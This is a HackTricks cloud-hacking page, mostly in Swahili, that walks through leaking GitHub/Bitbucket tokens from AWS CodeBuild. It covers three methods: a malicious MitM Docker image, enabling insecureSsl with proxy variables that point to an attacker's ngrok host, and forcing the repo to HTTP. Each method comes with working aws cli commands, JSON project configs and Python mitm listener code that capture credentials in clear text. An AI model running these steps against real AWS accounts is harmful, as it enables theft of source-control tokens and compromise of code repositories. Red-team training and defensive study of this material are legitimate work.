AWS Codebuild - Token Leakage

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Pata Tokens za Github/Bitbucket zilizosetiwa

Kwanza, angalia kama kuna source credentials zilizosetiwa ambazo unaweza leak:

aws codebuild list-source-credentials

Kupitia Docker Image

Ikiwa utagundua kwamba uthibitishaji kwa mfano Github umewekwa kwenye akaunti, unaweza exfiltrate ile access (GH token or OAuth token) kwa kufanya Codebuild kutumia docker image maalum kuendesha build ya mradi.

Kwa kusudi hili unaweza kuunda mradi mpya wa Codebuild au kubadilisha environment ya mojawapo iliyopo kuweka Docker image.

The Docker image you could use is https://github.com/carlospolop/docker-mitm. Hii ni Docker image rahisi sana ambayo itaweka env variables https_proxy, http_proxy na SSL_CERT_FILE. Hii itakuwezesha kuingilia sehemu kubwa ya trafiki ya mwenyeji iliyoonyeshwa kwenye https_proxy na http_proxy na kumwamini SSL CERT iliyoonyeshwa ndani ya SSL_CERT_FILE.

Tengeneza & Pandisha Docker MitM image yako mwenyewe

Fuata maelekezo ya repo ili kuweka anwani ya IP ya proxy yako na kuweka certificate ya SSL na kujenga docker image.
DO NOT SET http_proxy ili usiingilie maombi kwa metadata endpoint.
Unaweza kutumia ngrok kama ngrok tcp 4444 ili kuweka proxy kwa host yako
Mara baada ya kujenga Docker image, ipandishe kwenye repo ya umma (Dockerhub, ECR…)

Set the environment

Unda mradi mpya wa Codebuild au badilisha environment ya moja iliyopo.
Weka mradi utumie Docker image iliyotengenezwa hapo awali

Weka MitM proxy kwenye host yako

Kama ilivyoonyeshwa kwenye Github repo unaweza kutumia kitu kama:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

Tip

Toleo la mitmproxy lililotumika lilikuwa 9.0.1, iliripotiwa kwamba kwa toleo 10 hii inaweza isifanye kazi.

Endesha build & kunasa credentials

Unaweza kuona token katika kichwa cha Authorization:

Hii pia inaweza kufanywa kutoka kwa aws cli kwa kitu kama

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Kupitia insecureSSL

Codebuild miradi yana mipangilio inayoitwa insecureSsl ambayo imefichika kwenye wavuti; unaweza kuibadilisha tu kupitia API.
Kuwezesha hili kunaruhusu Codebuild kuungana na repository bila kukagua cheti kinachotolewa na jukwaa.

Kwanza unahitaji kuorodhesha usanidi wa sasa kwa kitu kama:

aws codebuild batch-get-projects --name <proj-name>

Kisha, kwa taarifa uliyoikusanya unaweza kusasisha project setting insecureSsl kuwa True. Hapa chini ni mfano wa jinsi nilivyofanya update ya project; zingatia insecureSsl=True mwishoni (hii ndiyo pekee unayohitaji kubadilisha kutoka kwa configuration uliyoikusanya).
Zaidi ya hayo, ongeza pia env variables http_proxy na https_proxy zikielekeza kwenye tcp ngrok yako kama ifuatavyo:

aws codebuild update-project --name <proj-name> \
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
}
]
}'

Kisha, endesha mfano wa msingi kutoka https://github.com/synchronizing/mitm katika bandari inayotajwa na vigezo vya proxy (http_proxy and https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

Mwisho, bonyeza Build the project, credentials zitatumwa kwa clear text (base64) kwenye bandari ya mitm:

Kupitia itifaki ya HTTP

[!TIP] > This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can’t abuse it anymore :)

Mshambuliaji mwenye idhini iliyoinuliwa kwenye CodeBuild anaweza leak token ya Github/Bitbucket iliyosanidiwa, au ikiwa idhini ilisanidiwa kupitia OAuth, temporary OAuth token inayotumika kufikia code.

Mshambuliaji anaweza kuongeza vigezo vya mazingira http_proxy na https_proxy kwenye mradi wa CodeBuild akielekeza kwenye mashine yake (kwa mfano http://5.tcp.eu.ngrok.io:14972).

Kisha, badilisha URL ya github repo ili itumie HTTP badala ya HTTPS, kwa mfano: http://github.com/carlospolop-forks/TestActions
Kisha, endesha mfano wa msingi kutoka https://github.com/synchronizing/mitm kwenye bandari inayorejelewa na vigezo vya proxy (http_proxy na https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="0.0.0.0",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

Ifuatayo, bonyeza Build the project au anza kujenga kutoka kwenye mstari wa amri:

aws codebuild start-build --project-name <proj-name>

Mwishowe, credentials zitatumwa kwa matini wazi (base64) kwenye mitm port:

Warning

Sasa mshambulizi ataweza kutumia token kutoka kwenye mashine yake, kuorodhesha idhini zote anazopata na kuitumia au kuitumia vibaya kwa urahisi kuliko kutumia huduma ya CodeBuild moja kwa moja.

Untrusted PR execution via webhook filter misconfiguration

For the PR-triggered webhook bypass chain (ACTOR_ACCOUNT_ID regex + untrusted PR execution), check:

AWS CodeBuild - Untrusted PR Webhook Bypass (CodeBreach-style)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.